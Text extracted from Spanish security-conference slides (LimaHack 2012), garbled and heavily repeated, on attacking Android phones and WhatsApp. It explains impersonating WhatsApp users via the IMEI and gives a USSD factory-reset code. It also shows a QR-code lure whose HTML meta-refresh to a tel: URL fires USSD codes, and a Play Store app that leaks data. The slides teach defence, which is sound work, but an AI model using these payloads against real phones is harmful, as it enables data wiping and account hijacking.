WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
